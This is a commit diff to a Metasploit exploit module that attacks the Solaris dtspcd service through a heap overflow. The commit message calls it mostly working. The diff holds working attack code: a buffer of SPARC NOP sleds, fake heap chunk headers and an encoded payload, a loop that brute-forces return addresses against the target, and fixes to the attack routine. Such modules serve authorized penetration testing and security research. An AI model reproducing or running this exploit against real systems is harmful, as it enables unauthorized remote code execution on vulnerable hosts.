Mostly working, shellcode/encoder/nops may be busted

git-svn-id: file:///home/svn/incoming/trunk@3275 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/solaris/dtspcd/heap_noir.rb

@@ -58,11 +58,11 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 		return if not dtspcd_uname()
 		
 		target['Rets'][4].each do |tjmp|
-		
+			
 			rbase = target['Rets'][1]
 			
 			while (rbase < target['Rets'][2]) do 
-				print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase)
+				print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
 				attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
 				attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
 				rbase += target['Rets'][3]
@@ -93,7 +93,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 
 	def chunk_create(retloc, retadd)
 		"\x12\x12\x12\x12" +
-		[retaddr].pack('N')+
+		[retadd].pack('N')+
 		"\x23\x23\x23\x23\xff\xff\xff\xff" +
 		"\x34\x34\x34\x34\x45\x45\x45\x45" +
 		"\x56\x56\x56\x56" +
@@ -104,15 +104,20 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 	def attack(retloc, retadd, fcode)
 		spc_connect()
 		
-		buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
+		begin
-		buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
+			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
-		buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
+			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
-		buf << "\x00\x00\x0f\xf4"
+			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
-		buf << chunk_create(retloc, retadd)
+			buf << "\x00\x00\x0f\xf4"
-		buf << "X" * ((0x103e - 8) - buf.length)
+			buf << chunk_create(retloc, retadd)
-		
+			buf << "X" * ((0x103e - 8) - buf.length)
-		spc_write(spc_register("", buf), 4)
+
-		sock.get_once(-1)
+			spc_write(spc_register("", buf), 4)
+			sock.get_once(-1)
+		rescue EOFError
+		rescue => e
+			$stderr.puts "Error: #{e.to_s} #{e.class.to_s}"
+		end
 	end